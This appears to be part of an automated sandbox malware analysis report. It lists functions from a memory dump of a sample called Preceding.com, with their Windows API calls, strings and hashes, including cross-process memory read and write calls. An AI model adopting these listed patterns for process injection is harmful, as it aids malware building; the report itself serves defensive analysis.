Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: f9188c4fad7c44da420def3087dc91950ecf97daf6e7f67770a2d0eebaaf54c0
Instruction ID: b3c397c0057f6a7ab540156f40001b235e0d19d31cc174e5f1686e7db545690c
Opcode Fuzzy Hash: f9188c4fad7c44da420def3087dc91950ecf97daf6e7f67770a2d0eebaaf54c0
Instruction Fuzzy Hash: EBF06275140311BBD7224F65EC59F963B6DEF8E7A0F114424F945C7251CA70D8508A60

Function 002F0CB6 Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,002F0B24,?,002F3D41,?,00000001,002C3AF4,?), ref: 002F0CCB
CloseHandle.KERNEL32(?,?,?,?,002F0B24,?,002F3D41,?,00000001,002C3AF4,?), ref: 002F0CD8
CloseHandle.KERNEL32(?,?,?,?,002F0B24,?,002F3D41,?,00000001,002C3AF4,?), ref: 002F0CE5
CloseHandle.KERNEL32(?,?,?,?,002F0B24,?,002F3D41,?,00000001,002C3AF4,?), ref: 002F0CF2
CloseHandle.KERNEL32(?,?,?,?,002F0B24,?,002F3D41,?,00000001,002C3AF4,?), ref: 002F0CFF
CloseHandle.KERNEL32(?,?,?,?,002F0B24,?,002F3D41,?,00000001,002C3AF4,?), ref: 002F0D0C

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 9205bb955763aeba66bb2773746864df1e68d87ec6431cec5c8c7ce98246223c
Instruction ID: 069f489691d4b8a322dea958199e5522c9ac0b1831456200dafeaa1a6984f03f
Opcode Fuzzy Hash: 9205bb955763aeba66bb2773746864df1e68d87ec6431cec5c8c7ce98246223c
Instruction Fuzzy Hash: 2801D071801B1A8FCB30AF66D8C0822F6F9BE503553118A3FD2A352922C7B0A954CE80

Function 002E65AB Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 002E65BF
GetWindowTextW.USER32(00000000,?,00000100), ref: 002E65D6
MessageBeep.USER32(00000000), ref: 002E65EE
KillTimer.USER32(?,0000040A), ref: 002E660A
EndDialog.USER32(?,00000001), ref: 002E6624

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 4170b96874c3c55351c20ca387bc1b5d4ffc97ce99a5e1bf92bb6b14c72f818e
Instruction ID: bf20f2cd95de0224b732332f17614f15800533123ffd3bcd360bbe71c2d1464c
Opcode Fuzzy Hash: 4170b96874c3c55351c20ca387bc1b5d4ffc97ce99a5e1bf92bb6b14c72f818e
Instruction Fuzzy Hash: 2D018630560304ABEB315F11DD4EBD67B7CFB15745F804559A186610E1DBF4AA548B50

Function 002BDABA Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 002BDAD2

Part of subcall function 002B2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,002BDB51,00351DC4,00000000,00351DC4,00000000,?,002BDB78,00351DC4,00000007,00351DC4,?,002BDF75,00351DC4), ref: 002B2D4E
Part of subcall function 002B2D38: GetLastError.KERNEL32(00351DC4,?,002BDB51,00351DC4,00000000,00351DC4,00000000,?,002BDB78,00351DC4,00000007,00351DC4,?,002BDF75,00351DC4,00351DC4), ref: 002B2D60

_free.LIBCMT ref: 002BDAE4
_free.LIBCMT ref: 002BDAF6
_free.LIBCMT ref: 002BDB08
_free.LIBCMT ref: 002BDB1A

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 0f3bf4cf0ec3c41df736c06bb793bf616d7eede104b91df1d9891dfacf61c20b
Instruction ID: 4a8adf3e6d72b3e24785058c7c0e5bff04de467b21d790306a23facd69446abe
Opcode Fuzzy Hash: 0f3bf4cf0ec3c41df736c06bb793bf616d7eede104b91df1d9891dfacf61c20b
Instruction Fuzzy Hash: 1EF01232664306EB8665EF68E981DDA77DDEE05790BA54C09F049DB501DF30FC908A54

Function 002B2610 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 002B262E

Part of subcall function 002B2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,002BDB51,00351DC4,00000000,00351DC4,00000000,?,002BDB78,00351DC4,00000007,00351DC4,?,002BDF75,00351DC4), ref: 002B2D4E
Part of subcall function 002B2D38: GetLastError.KERNEL32(00351DC4,?,002BDB51,00351DC4,00000000,00351DC4,00000000,?,002BDB78,00351DC4,00000007,00351DC4,?,002BDF75,00351DC4,00351DC4), ref: 002B2D60

_free.LIBCMT ref: 002B2640
_free.LIBCMT ref: 002B2653
_free.LIBCMT ref: 002B2664
_free.LIBCMT ref: 002B2675

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 3f3b4e860f014e2a783ae97bd862bdf2fb4d06605243e7f24594e0297b2f02c5
Instruction ID: 5ca190db3f895ec2f57b31ec366101b781c4d815e09f2baf9ff715e828c31f0e
Opcode Fuzzy Hash: 3f3b4e860f014e2a783ae97bd862bdf2fb4d06605243e7f24594e0297b2f02c5
Instruction Fuzzy Hash: C2F05479611311CB8753AF54FD019D9376CFB29792B014F06F414D6274CB301925AFC5

Function 002B12B7 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 002B1469
__freea.LIBCMT ref: 002B1487

Part of subcall function 002B18A7: _free.LIBCMT ref: 002B18BF

Strings

a/p, xrefs: 002B154E
am/pm, xrefs: 002B14EA

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: 2b60aeb75ddaae61ffad47e2704cb5feadc9eed02b61ade6ae43d9f56e6cff4e
Instruction ID: 3abb9c63f9952e9801ecc8747cf1846c9a9f67ad5e88c0df9e2a48435da57a47
Opcode Fuzzy Hash: 2b60aeb75ddaae61ffad47e2704cb5feadc9eed02b61ade6ae43d9f56e6cff4e
Instruction Fuzzy Hash: D8D1F1719302079BCB289F68C8757FAB7B5FF05380FA8415AE902AB250D7759DB0CB90

Function 00305231 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 315COMMON

Download Yara Rule

APIs

Part of subcall function 002F41FA: GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,003052EE,?,?,00000035,?), ref: 002F4229
Part of subcall function 002F41FA: FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,003052EE,?,?,00000035,?), ref: 002F4239

GetLastError.KERNEL32(?,00000000,?,?,00000035,?), ref: 00305419
VariantInit.OLEAUT32(?), ref: 0030550E
VariantClear.OLEAUT32(?), ref: 003055CD

Strings

bn., xrefs: 003054ED, 003055E4

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: ErrorLastVariant$ClearFormatInitMessage
String ID: bn.
API String ID: 2854431205-2478476730
Opcode ID: bd9f54ddece203eba1293754518f272535826daf45e5e05f8bb128a6654ddc2b
Instruction ID: 67fe2200b32ce3dd7c80f36c9f6dca69dc29bdc5948ac2da389a76b960970034
Opcode Fuzzy Hash: bd9f54ddece203eba1293754518f272535826daf45e5e05f8bb128a6654ddc2b
Instruction Fuzzy Hash: 30D17D74911248DFCB09EF95C8D0AEEBBB8FF48304F54805DE416AB292DB71A996CF50

Function 0028CF80 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 232COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0028D253

Strings

t55, xrefs: 0028CFCF
t55, xrefs: 0028D23A
t55, xrefs: 0028CFC8

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Init_thread_footer
String ID: t55$t55$t55
API String ID: 1385522511-524786544
Opcode ID: f5a3608ac282dcc2e3b93ff02765bf678251d95aebbae5b0327af371a064da62
Instruction ID: fb0b05247dd17e915ae73eb68f002844833125f3c435b4a972547775688748da
Opcode Fuzzy Hash: f5a3608ac282dcc2e3b93ff02765bf678251d95aebbae5b0327af371a064da62
Instruction Fuzzy Hash: 1E917A79A21206CFCB14DF58C480AA9B7F1FF59300F24855AD945AB3D0E771AAA6CF90

Function 003061A2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?), ref: 0030623D
_wcslen.LIBCMT ref: 00306249

Strings

CALLARGARRAY, xrefs: 00306243, 00306248
bn., xrefs: 003061B1, 003062E1

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY$bn.
API String ID: 157775604-4211631924
Opcode ID: 3ef24d6656f2888a366c625fb6fc4d3fb2cfdba81ae601e3627eb2539afb4ebe
Instruction ID: d7670b86c6623b4e7e61da90f206f0a2b1e1bfc67feacedc534348ad0886befd
Opcode Fuzzy Hash: 3ef24d6656f2888a366c625fb6fc4d3fb2cfdba81ae601e3627eb2539afb4ebe
Instruction Fuzzy Hash: 5C41E231E01205DFCB05EFA5C8929EEBBB9FF59320F114429E405A7296D7709DA1CF90

Function 002E3063 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 002EBDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002E2B1D,?,?,00000034,00000800,?,00000034), ref: 002EBDF4

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 002E30AD

Part of subcall function 002EBD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002E2B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 002EBDBF

Part of subcall function 002EBCF1: GetWindowThreadProcessId.USER32(?,?), ref: 002EBD1C
Part of subcall function 002EBCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,002E2AE1,00000034,?,?,00001004,00000000,00000000), ref: 002EBD2C
Part of subcall function 002EBCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,002E2AE1,00000034,?,?,00001004,00000000,00000000), ref: 002EBD42

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 002E311A
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 002E3167

Strings

@, xrefs: 002E317F

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: dcb328137df9c1cc9a7e7fa6be26cf840953d7bdf6a12c1615e3c30aa9a14e25
Instruction ID: 457d4d50c1b700d544d36b07ff4776489079c0594c0c99d58ddfda3b4e2a199f
Opcode Fuzzy Hash: dcb328137df9c1cc9a7e7fa6be26cf840953d7bdf6a12c1615e3c30aa9a14e25
Instruction Fuzzy Hash: 0E413B76940258AEDB11DFA5CC85ADEBBB8EF49700F104099FA45BB180DB706F95CF60

Function 002B1A9E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com,00000104), ref: 002B1AD9
_free.LIBCMT ref: 002B1BA4
_free.LIBCMT ref: 002B1BAE

Strings

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com, xrefs: 002B1AD0, 002B1AD7, 002B1B06, 002B1B3E

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com
API String ID: 2506810119-3285996108
Opcode ID: f4fc768299fcc85e9a211087019737ac794a68cef5ee0ff7df0afe75f0fa4b79
Instruction ID: 3d8f75180cf30b369cf9e90b6b9ecf66028b715331d3351930488d8d4b674a3b
Opcode Fuzzy Hash: f4fc768299fcc85e9a211087019737ac794a68cef5ee0ff7df0afe75f0fa4b79
Instruction Fuzzy Hash: BA318D71A20219ABCB21DF99CC91DDFBBBCEB85794F5041A6E80497221E6B05E60CB90

Function 002ECB28 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 002ECBB1
DeleteMenu.USER32(?,00000007,00000000), ref: 002ECBF7
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,003529C0,014F6460), ref: 002ECC40

Strings

0, xrefs: 002ECB8A

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: dfe37919f38594fdb47195987b3c0eb2c7bfc989673513d3bfd5088a93756b09
Instruction ID: d732c63bf261c2293ef3790a97ffebd873def5f8e9f7e4457707cc3f682fde8e
Opcode Fuzzy Hash: dfe37919f38594fdb47195987b3c0eb2c7bfc989673513d3bfd5088a93756b09
Instruction Fuzzy Hash: F341F2312543829FD720DF65C884F5ABBE8EF89B24F24461EF4A9972D1CB30E915CB52

Function 00314EB4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0031DCD0,00000000,?,?,?,?), ref: 00314F48
GetWindowLongW.USER32 ref: 00314F65
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00314F75

Strings

SysTreeView32, xrefs: 00314F1A

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 3c027b83a66df77a3f7f98a560fe3c81e5cb83a2086fc0bb2506eff733891083
Instruction ID: be4e95fdb09122c7885dcdacdc6ec32c2860e86c26170e3818ffa7a62547ec75
Opcode Fuzzy Hash: 3c027b83a66df77a3f7f98a560fe3c81e5cb83a2086fc0bb2506eff733891083
Instruction Fuzzy Hash: 9F31BE31214205AFDB269F78CC45BEA77A9EF09334F214714F979A22E0C770ECA19B50

Function 00303AAB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00303DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00303AD4,?,?), ref: 00303DD5

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00303AD7
_wcslen.LIBCMT ref: 00303AF8
htons.WSOCK32(00000000,?,?,00000000), ref: 00303B63

Strings

255.255.255.255, xrefs: 00303AF2, 00303AF7

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: 8e90d2a77f173a068760eb3b674eed8b2709934b35d729d55e096d8f9c209b2b
Instruction ID: ecc2209784c4e2cea0d525e450bc81f96c347fe458a8d16e193620ad2d5c2157
Opcode Fuzzy Hash: 8e90d2a77f173a068760eb3b674eed8b2709934b35d729d55e096d8f9c209b2b
Instruction Fuzzy Hash: 9A31D1392052019FCB12CF68C495EAA77E8EF15328F258159E8168B7E2D771EE45CB60

Function 00314954 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 003149DC
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 003149F0
SendMessageW.USER32(?,00001002,00000000,?), ref: 00314A14

Strings

SysMonthCal32, xrefs: 003149A7

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: b833206f94861ab0d375e480c236553262693fabac5763c78368ebae3b395941
Instruction ID: f705375cf24d79484b1aca4d59bcf65df00127c4f1df7efe953a69b2bbbbf8b4
Opcode Fuzzy Hash: b833206f94861ab0d375e480c236553262693fabac5763c78368ebae3b395941
Instruction Fuzzy Hash: 0421BF32610219ABDF168F90CC42FEB3B69EF4C714F124214FA156B0D0D6B1A8919B90

Function 003150F1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 003151A3
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 003151B1
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 003151B8

Strings

msctls_updown32, xrefs: 00315122

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: d2c4a08c160fddcb83294c3e6d0f9db3f892d13c48ff3761bceaf589440613d6
Instruction ID: 4c95253901e1cb09bc20d9107aff2e2185bda8411ace2c7279f885c6030a2b58
Opcode Fuzzy Hash: d2c4a08c160fddcb83294c3e6d0f9db3f892d13c48ff3761bceaf589440613d6
Instruction Fuzzy Hash: F3218EB5600609BFDB06DF24CC81EAB37ADEF9A364B150059F9009B3A1CB30EC51CBA0

Function 00314253 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 003142DC
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 003142EC
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00314312

Strings

Listbox, xrefs: 003142AB

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 30aaa59bd66a4def24a9cc7528a95ebfd6f2660dbd4d45dbebced4c8a273c2c4
Instruction ID: d6856578a7ba1f2956e12380e67bd5758495959d70d3992a4d522240d1bae457
Opcode Fuzzy Hash: 30aaa59bd66a4def24a9cc7528a95ebfd6f2660dbd4d45dbebced4c8a273c2c4
